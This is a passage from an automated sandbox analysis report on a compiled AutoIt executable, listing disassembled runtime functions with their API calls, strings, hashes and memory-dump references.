                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                    • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                    • API String ID: 2495805114-3383388033
                                                                                                                    • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                    • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                    Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1933 40e5ec-40e60c 1918->1933 1934 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1934 1935 4276c6-4276ca GetSystemInfo 1920->1935 1921->1920 1930 427698-4276a8 1921->1930 1922->1920 1926 427636-427640 1923->1926 1927 42762b-427631 1923->1927 1928 40e5a5-40e5ae 1924->1928 1929 427654-427657 1924->1929 1926->1918 1927->1918 1937 40e5b4 1928->1937 1938 427645-42764f 1928->1938 1929->1918 1936 42765d-42766f 1929->1936 1931 4276b0 1930->1931 1932 4276aa-4276ae 1930->1932 1931->1920 1932->1920 1940 40e612-40e623 call 40efd0 1933->1940 1941 4276d5-4276df GetSystemInfo 1933->1941 1934->1933 1947 40e5e8 1934->1947 1935->1941 1936->1918 1937->1918 1938->1918 1940->1935 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1933 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                    • String ID: 0SH
                                                                                                                    • API String ID: 3363477735-851180471
                                                                                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                    Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                                                                    • API String ID: 2574300362-3542929980
                                                                                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                    Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                    • API String ID: 1762048999-758534266
                                                                                                                    • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                    • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                    Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                    • API String ID: 3948761352-1609664196
                                                                                                                    • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                    • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                    Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                    • _wcscat.LIBCMT ref: 00427541
                                                                                                                    • _wcslen.LIBCMT ref: 00427551
                                                                                                                    • _wcslen.LIBCMT ref: 00427562
                                                                                                                    • _wcscat.LIBCMT ref: 0042757C
                                                                                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                    • String ID: Include$\
                                                                                                                    • API String ID: 3173733714-3429789819
                                                                                                                    • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                    • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                    • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                    • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                    Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _fseek.LIBCMT ref: 0045292B
                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                    • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                    • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                    • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                    • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                    • _fseek.LIBCMT ref: 004529BF
                                                                                                                    • _malloc.LIBCMT ref: 004529CA
                                                                                                                    • _malloc.LIBCMT ref: 004529D6
                                                                                                                    • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                    • _free.LIBCMT ref: 00452A17
                                                                                                                    • _free.LIBCMT ref: 00452A20
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255752989-0
                                                                                                                    • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                    • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                    • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                    • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                                    Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 3888824918-3121273764
                                                                                                                    • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                    • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                                    Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                    • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                    • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00930360,000000FF,00000000), ref: 00410552
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                    • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                    • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                    • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                    Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                    • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                    • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                    • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                    • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                      • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                      • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                      • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                      • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                      • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                      • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                      • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00930360,000000FF,00000000), ref: 00410552
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                    Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc
                                                                                                                    • String ID: Default
                                                                                                                    • API String ID: 1579825452-753088835
                                                                                                                    • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
